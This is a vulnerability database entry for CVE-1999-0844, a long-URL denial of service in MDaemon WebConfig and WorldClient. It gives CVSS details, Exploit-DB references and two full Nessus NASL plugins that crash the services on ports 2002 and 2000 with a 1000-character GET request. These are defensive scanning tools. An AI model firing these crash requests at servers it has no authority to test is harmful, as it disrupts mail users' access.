Vulnerabilities > CVE-1999-0844 - WebConfig Overflow DoS vulnerability in Deerfield Mdaemon 2.8.5/2.8.6
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
PARTIAL Summary
Denial of service in MDaemon WorldClient and WebConfig services via a long URL.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 2 |
Exploit-Db
description Alt-N MDaemon 2.8.5 0 WebConfig Overflow DoS Vulnerability. CVE-1999-0844. Dos exploit for windows platform id EDB-ID:19639 last seen 2016-02-02 modified 1999-11-24 published 1999-11-24 reporter Ussr Labs source https://www.exploit-db.com/download/19639/ title Alt-N MDaemon 2.8.5 - WebConfig Overflow DoS Vulnerability description Alt-N WorldClient Pro 2.0 .0.0/2.0.1 .0/Standard 2.0 .0.0 Long URL DoS Vulnerability. CVE-1999-0844. Dos exploit for windows platform id EDB-ID:19640 last seen 2016-02-02 modified 1999-11-26 published 1999-11-26 reporter Ussr Labs source https://www.exploit-db.com/download/19640/ title Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL DoS Vulnerability
Nessus
NASL family Web Servers NASL id MDAEMON_WEBCONFIG.NASL description It was possible to crash Webconfig (which is used to configure MDaemon) by sending the request : GET /aaaaa[...]aaa HTTP/1.0 This could allow a remote attacker to crash the web server, preventing the MDaemon server from being configured remotely. last seen 2020-06-01 modified 2020-06-02 plugin id 10138 published 1999-11-24 reporter This script is Copyright (C) 1999-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10138 title MDaemon WebConfig HTTP Server URL Overflow DoS code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if(description) { script_id(10138); script_version ("1.29"); script_cve_id("CVE-1999-0844"); script_bugtraq_id(820); script_name(english:"MDaemon WebConfig HTTP Server URL Overflow DoS"); script_summary(english:"Crashes the remote service"); script_set_attribute( attribute:"synopsis", value:"The remote web server has a denial of service vulnerability." ); script_set_attribute( attribute:"description", value: "It was possible to crash Webconfig (which is used to configure MDaemon) by sending the request : GET /aaaaa[...]aaa HTTP/1.0 This could allow a remote attacker to crash the web server, preventing the MDaemon server from being configured remotely." ); script_set_attribute( attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Nov/340" ); script_set_attribute( attribute:"solution", value:"Upgrade to the latest version of this software." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "1999/11/24"); script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/24"); script_cvs_date("Date: 2018/11/15 20:50:25"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); script_family(english:"Web Servers"); script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc."); script_dependencie("http_version.nasl"); script_require_ports(2002); exit(0); } # # The script code starts here # include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = 2002; if(! get_port_state(port)) exit(0, "Port "+port+" is closed"); if(http_is_dead(port:port))exit(0, "The web server on port "+port+" is dead"); w = http_send_recv3(method:"GET", item: crap(1000), port:port); if (http_is_dead(port:port)) security_warning(port);NASL family Web Servers NASL id MDAEMON_WORLDCLIENT.NASL description It was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending : GET /aaaaa[...]aaa HTTP/1.0 This issue allows a remote attacker to prevent users from reading their email. last seen 2020-06-01 modified 2020-06-02 plugin id 10139 published 1999-11-24 reporter This script is Copyright (C) 1999-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10139 title MDaemon WorldClient HTTP Server URL Overflow DoS code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if(description) { script_id(10139); script_version ("1.29"); script_cve_id("CVE-1999-0844"); script_bugtraq_id(823); script_name(english:"MDaemon WorldClient HTTP Server URL Overflow DoS"); script_summary(english:"Crashes the remote service"); script_set_attribute( attribute:"synopsis", value:"The remote web server has a denial of service vulnerability." ); script_set_attribute( attribute:"description", value: "It was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending : GET /aaaaa[...]aaa HTTP/1.0 This issue allows a remote attacker to prevent users from reading their email." ); script_set_attribute( attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Nov/340" ); script_set_attribute( attribute:"solution", value:"Upgrade to the latest version of this software." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "1999/11/24"); script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/24"); script_cvs_date("Date: 2018/11/15 20:50:25"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); script_family(english:"Web Servers"); script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc."); script_dependencie("http_version.nasl"); script_require_ports(2000); exit(0); } # # The script code starts here # include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = 2000; if (! get_port_state(port)) exit(0, "Port "+port+" is closed"); if (http_is_dead(port:port)) exit(0, "The web server on port "+port+" is dead"); w = http_send_recv3(method:"GET", port:port, item: crap(1000)); if (http_is_dead(port:port))security_warning(port);